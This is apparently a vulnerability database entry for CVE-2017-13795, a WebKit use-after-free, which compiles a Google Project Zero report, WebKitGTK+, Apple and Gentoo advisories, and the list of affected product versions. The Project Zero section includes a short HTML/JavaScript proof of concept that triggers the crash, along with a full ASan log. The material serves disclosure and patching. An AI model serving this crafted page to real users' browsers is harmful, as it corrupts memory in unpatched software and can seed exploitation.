Details of VAR-201711-0447

ID

VAR-201711-0447

CVE

CVE-2017-13795

TITLE

plural Apple Used in products WebKit Vulnerability in arbitrary code execution in components

Trust: 0.8

sources: JVNDB: JVNDB-2017-010339

DESCRIPTION

An issue was discovered in certain Apple products. iOS before 11.1 is affected. Safari before 11.0.1 is affected. iCloud before 7.1 on Windows is affected. iTunes before 12.7.1 on Windows is affected. tvOS before 11.1 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site. Apple iOS, iCloud for Windows, iTunes for Windows, Safari, and tvOS are all products of the American company Apple (Apple). Apple iOS is an operating system developed for mobile devices; Safari is a web browser that comes with the Mac OS X and iOS operating systems by default. WebKit is an open source web browser engine developed by the KDE community and is currently used by browsers such as Apple Safari and Google Chrome. WebKit: use-after-free in WebCore::AXObjectCache::performDeferredCacheUpdate CVE-2017-13795 There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. Note that accessibility features need to be enabled in order to trigger this bug. On Safari on Mac this can be accomplished by opening the inspector (simply opening the inspector enables accessibility features). On WebKitGTK+ (and possibly other WebKit releases) accessibility features are enabled by default. PoC: ================================================================= <style> #colgrp { display: table-footer-group; } .class1 { text-transform: capitalize; display: -webkit-box; } </style> <script> function go() { textarea.setSelectionRange(30,1); option.defaultSelected = true; col.setAttribute("aria-labeledby", "link"); } </script> <body onload=go()> <link id="link"> <table> <colgroup id="colgrp"> <col id="col" tabindex="1"></col> <thead class="class1"> <th class="class1"> <textarea id="textarea" readonly="readonly"></textarea> <option id="option"></option> ================================================================= ASan log: ================================================================= ==30369==ERROR: AddressSanitizer: heap-use-after-free on address 0x603000346940 at pc 0x000113012178 bp 0x7fff563cac80 sp 0x7fff563cac78 READ of size 8 at 0x603000346940 thread T0 ==30369==WARNING: invalid path to external symbolizer! ==30369==WARNING: Failed to use and restart external symbolizer! #0 0x113012177 in WTF::ListHashSetConstIterator<WebCore::Node*, WTF::PtrHash<WebCore::Node*> >::operator++() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f3177) #1 0x112ff326d in WTF::ListHashSetIterator<WebCore::Node*, WTF::PtrHash<WebCore::Node*> >::operator++() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d426d) #2 0x113007cf2 in WebCore::AXObjectCache::performDeferredCacheUpdate() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1e8cf2) #3 0x115dcb242 in WebCore::ThreadTimers::sharedTimerFiredInternal() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2fac242) #4 0x114f89e74 in WebCore::timerFired(__CFRunLoopTimer*, void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x216ae74) #5 0x7fffd5298c53 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x90c53) #6 0x7fffd52988de in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x908de) #7 0x7fffd5298439 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x90439) #8 0x7fffd528fb80 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87b80) #9 0x7fffd528f113 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87113) #10 0x7fffd47efebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb) #11 0x7fffd47efcf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0) #12 0x7fffd47efb25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25) #13 0x7fffd2d88a53 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46a53) #14 0x7fffd35047ed in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c27ed) #15 0x7fffd2d7d3da in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b3da) #16 0x7fffd2d47e0d in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5e0d) #17 0x7fffeac688c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6) #18 0x7fffeac672e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3) #19 0x10983356c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c) #20 0x7fffeaa0f234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234) 0x603000346940 is located 16 bytes inside of 24-byte region [0x603000346930,0x603000346948) freed by thread T0 here: #0 0x10ca9c294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294) #1 0x11ffee650 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d72650) #2 0x11300fccb in WTF::ListHashSet<WebCore::Node*, WTF::PtrHash<WebCore::Node*> >::deleteAllNodes() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f0ccb) #3 0x113007edd in WTF::ListHashSet<WebCore::Node*, WTF::PtrHash<WebCore::Node*> >::clear() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1e8edd) #4 0x113007d30 in WebCore::AXObjectCache::performDeferredCacheUpdate() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1e8d30) #5 0x1139a3d4a in WebCore::FrameView::layout(bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb84d4a) #6 0x1135afb10 in WebCore::Document::updateLayout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x790b10) #7 0x1135b6542 in WebCore::Document::updateLayoutIgnorePendingStylesheets(WebCore::Document::RunPostLayoutTasks) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x797542) #8 0x1137764b1 in WebCore::Element::innerText() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9574b1) #9 0x112e437cc in WebCore::accessibleNameForNode(WebCore::Node*, WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x247cc) #10 0x112e47a63 in WebCore::AccessibilityNodeObject::accessibilityDescriptionForElements(WTF::Vector<WebCore::Element*, 0ul, WTF::CrashOnOverflow, 16ul>&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28a63) #11 0x112e47dce in WebCore::AccessibilityNodeObject::ariaLabeledByAttribute() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28dce) #12 0x112e40a59 in WebCore::AccessibilityNodeObject::ariaAccessibilityDescription() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x21a59) #13 0x112e47eec in WebCore::AccessibilityNodeObject::hasAttributesRequiredForInclusion() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28eec) #14 0x112e79f53 in WebCore::AccessibilityRenderObject::computeAccessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x5af53) #15 0x112e613eb in WebCore::AccessibilityObject::accessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x423eb) #16 0x112ff54b1 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d64b1) #17 0x112ff377f in WebCore::AXObjectCache::getOrCreate(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d477f) #18 0x112ff8bbd in WebCore::AXObjectCache::textChanged(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d9bbd) #19 0x113007cea in WebCore::AXObjectCache::performDeferredCacheUpdate() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1e8cea) #20 0x115dcb242 in WebCore::ThreadTimers::sharedTimerFiredInternal() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2fac242) #21 0x114f89e74 in WebCore::timerFired(__CFRunLoopTimer*, void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x216ae74) #22 0x7fffd5298c53 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x90c53) #23 0x7fffd52988de in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x908de) #24 0x7fffd5298439 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x90439) #25 0x7fffd528fb80 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87b80) #26 0x7fffd528f113 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87113) #27 0x7fffd47efebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb) #28 0x7fffd47efcf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0) #29 0x7fffd47efb25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25) previously allocated by thread T0 here: #0 0x10ca9bd2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c) #1 0x7fffeab91281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281) #2 0x11ffeead4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d72ad4) #3 0x11ffecd6d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d70d6d) #4 0x11ff73247 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf7247) #5 0x11ff7263a in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf663a) #6 0x113011c38 in WTF::ListHashSetNode<WebCore::Node*>::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f2c38) #7 0x113020d79 in void WTF::ListHashSetTranslator<WTF::PtrHash<WebCore::Node*> >::translate<WTF::ListHashSetNode<WebCore::Node*>, WebCore::Node* const&, std::nullptr_t>(WTF::ListHashSetNode<WebCore::Node*>*&, WebCore::Node* const&&&, std::nullptr_t&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x201d79) #8 0x112ffbec9 in WTF::ListHashSet<WebCore::Node*, WTF::PtrHash<WebCore::Node*> >::add(WebCore::Node* const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dcec9) #9 0x112ffb785 in WebCore::AXObjectCache::deferTextChangedIfNeeded(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dc785) #10 0x11376c58e in WebCore::Element::attributeChanged(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&, WebCore::Element::AttributeModificationReason) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x94d58e) #11 0x11377298d in WebCore::Element::didAddAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x95398d) #12 0x1137727a1 in WebCore::Element::addAttributeInternal(WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9537a1) #13 0x11376bf12 in WebCore::Element::setAttributeInternal(unsigned int, WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x94cf12) #14 0x11376bd0b in WebCore::Element::setAttribute(WTF::AtomicString const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x94cd0b) #15 0x114443e31 in WebCore::jsElementPrototypeFunctionSetAttributeBody(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1624e31) #16 0x1144392e8 in long long WebCore::IDLOperation<WebCore::JSElement>::call<&(WebCore::jsElementPrototypeFunctionSetAttributeBody(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x161a2e8) #17 0x3c5768201027 (<unknown module>) #18 0x11f926e49 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16aae49) #19 0x11f926e49 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16aae49) #20 0x11f91ff6f in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16a3f6f) #21 0x11f583847 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1307847) #22 0x11f50488a in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x128888a) #23 0x11eb1d731 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1731) #24 0x11eb1d9a2 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a19a2) #25 0x11eb1dd13 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1d13) #26 0x11405d615 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x123e615) #27 0x1144706cd in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x16516cd) #28 0x1137dc010 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bd010) #29 0x1137dbae0 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bcae0) SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f3177) in WTF::ListHashSetConstIterator<WebCore::Node*, WTF::PtrHash<WebCore::Node*> >::operator++() Shadow bytes around the buggy address: 0x1c0600068cd0: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd 0x1c0600068ce0: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa 0x1c0600068cf0: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa 0x1c0600068d00: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd 0x1c0600068d10: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa =>0x1c0600068d20: fd fd fd fa fa fa fd fd[fd]fa fa fa 00 00 00 02 0x1c0600068d30: fa fa 00 00 00 01 fa fa 00 00 06 fa fa fa fd fd 0x1c0600068d40: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa 0x1c0600068d50: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa 0x1c0600068d60: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd 0x1c0600068d70: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==30369==ABORTING This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public. Found by: ifratric . ------------------------------------------------------------------------ WebKitGTK+ Security Advisory WSA-2017-0009 ------------------------------------------------------------------------ Date reported : November 10, 2017 Advisory ID : WSA-2017-0009 Advisory URL : https://webkitgtk.org/security/WSA-2017-0009.html CVE identifiers : CVE-2017-13783, CVE-2017-13784, CVE-2017-13785, CVE-2017-13788, CVE-2017-13791, CVE-2017-13792, CVE-2017-13793, CVE-2017-13794, CVE-2017-13795, CVE-2017-13796, CVE-2017-13798, CVE-2017-13802, CVE-2017-13803. Several vulnerabilities were discovered in WebKitGTK+. Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to xisigr of Tencent's Xuanwu Lab (tencent.com). Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to Hanul Choi working with Trend Micro's Zero Day Initiative. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to chenqin (ee|) of Ant-financial Light-Year Security. Description: Multiple memory corruption issues were addressed with improved memory handling. We recommend updating to the last stable version of WebKitGTK+. It is the best way of ensuring that you are running a safe version of WebKitGTK+. Please check our website for information about the last stable releases. Further information about WebKitGTK+ Security Advisories can be found at: https://webkitgtk.org/security.html The WebKitGTK+ team, November 10, 2017 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 APPLE-SA-2017-10-31-3 tvOS 11.1 tvOS 11.1 is now available and addresses the following: CoreText Available for: Apple TV 4K and Apple TV (4th generation) Impact: Processing a maliciously crafted text file may lead to an unexpected application termination Description: A denial of service issue was addressed through improved memory handling. CVE-2017-13849: Ro of SavSec Kernel Available for: Apple TV 4K and Apple TV (4th generation) Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2017-13799: an anonymous researcher StreamingZip Available for: Apple TV 4K and Apple TV (4th generation) Impact: A malicious zip file may be able modify restricted areas of the file system Description: A path handling issue was addressed with improved validation. CVE-2017-13804: @qwertyoruiopz at KJC Research Intl. S.R.L. This was addressed with improved state management. CVE-2017-13080: Mathy Vanhoef of the imec-DistriNet group at KU Leuven Installation note: Apple TV will periodically check for software updates. Alternatively, you may manually check for software updates by selecting "Settings -> System -> Software Update -> Update Software." To check the current version of software, select "Settings -> General -> About." Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- iQJdBAEBCgBHFiEEcuX4rtoRe4X62yWlg6PvjDRstEYFAln4u78pHHByb2R1Y3Qt c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQg6PvjDRstEYANRAA mwauLif6cLmTRZf4ENKJUA1oMP5xVnua/W8eG3Pb5/7InUls4m3chSI0uCzcGD4w Z4wVG/2ONKfHU/xjAB/IJcnBphQUsJyKyYp+mMDJHt5HJPW1gpyzdKoSmy3plFPM Pghs6v5DaG1vF9s+zqNrnBQwX0Juqwo87CBcDfg5862p5gxWocpSsLGZ0DZ9sErn eMkD/jTG9H4XYsI7T34DvDzCdFsFWGPPN6nWb9Vb0tcW4D/1WSaxJKJApXdJU6yz Fj6W7CnFOkw7SSA1qb2xl7FyVN4mzxRTRF0f8IsCQfzI7kLpNJ6rIFX0kca8FVYM ORzOLigK4eUuEeuCRV32yZuvxDF/2st3TzmFs0XKnzzd9MTIsqZogh/cv7v3MCUd FBhfEiANx86AO6OZ5VtTzqLbchm3Dws15s6G94Cmj/epuGgHYpnKnJewlpX/pVW+ QSJ+QY/q9ucjd9pnDbcutt8gfY0NCLlyjix5i0I/zAm1LhqGJJAmh1nAziiIPfzl BwI+awHCJMn9MTI56vrNsyfMIdd2X7Cux5OxEmr0sMkjAYdf3HVXA8fMb7tzukRT br+WwVWAskuJCC2PiYHcGz1x7GTzZBWXPJ6/U1K+PsUSfN/nQKdh2U3L7ivVfRWi sB8o+ec+qJeAoT41wLeCb67PgvFF//Gul8g5eh68wCI= =255g -----END PGP SIGNATURE----- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201712-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - https://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: WebKitGTK+: Multiple vulnerabilities Date: December 14, 2017 Bugs: #637076 ID: 201712-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been discovered in WebKitGTK+, the worst of which may lead to arbitrary code execution. Background ========== WebKitGTK+ is a full-featured port of the WebKit rendering engine, suitable for projects requiring any kind of web integration, from hybrid HTML/CSS applications to full-fledged web browsers. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-libs/webkit-gtk < 2.18.3 >= 2.18.3 Description =========== Multiple vulnerabilities have been discovered in WebKitGTK+. Please review the referenced CVE identifiers for details. Workaround ========== There are no known workarounds at this time. Resolution ========== All WebKitGTK+ users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.18.3" References ========== [ 1 ] CVE-2017-13783 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13783 [ 2 ] CVE-2017-13784 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13784 [ 3 ] CVE-2017-13785 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13785 [ 4 ] CVE-2017-13788 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13788 [ 5 ] CVE-2017-13791 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13791 [ 6 ] CVE-2017-13792 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13792 [ 7 ] CVE-2017-13793 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13793 [ 8 ] CVE-2017-13794 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13794 [ 9 ] CVE-2017-13795 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13795 [ 10 ] CVE-2017-13796 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13796 [ 11 ] CVE-2017-13798 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13798 [ 12 ] CVE-2017-13802 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13802 [ 13 ] CVE-2017-13803 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13803 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: https://security.gentoo.org/glsa/201712-01 Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2017 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5

Trust: 2.43

sources: NVD: CVE-2017-13795 // JVNDB: JVNDB-2017-010339 // VULHUB: VHN-104453 // VULMON: CVE-2017-13795 // PACKETSTORM: 145087 // PACKETSTORM: 144947 // PACKETSTORM: 144861 // PACKETSTORM: 144828 // PACKETSTORM: 145415 // PACKETSTORM: 144830 // PACKETSTORM: 144831

AFFECTED PRODUCTS

vendor:	apple	model:	itunes	scope:	lt	version:	12.7.1	Trust: 1.0
vendor:	apple	model:	icloud	scope:	lt	version:	7.1	Trust: 1.0
vendor:	apple	model:	webkit	scope:	eq	version:	-	Trust: 1.0
vendor:	apple	model:	iphone os	scope:	lt	version:	11.1	Trust: 1.0
vendor:	apple	model:	safari	scope:	lt	version:	11.0.1	Trust: 1.0
vendor:	apple	model:	tvos	scope:	lt	version:	11.1	Trust: 1.0
vendor:	apple	model:	icloud	scope:	lt	version:	7.1 (windows 7 or later )	Trust: 0.8
vendor:	apple	model:	ios	scope:	lt	version:	11.1 (ipad air or later )	Trust: 0.8
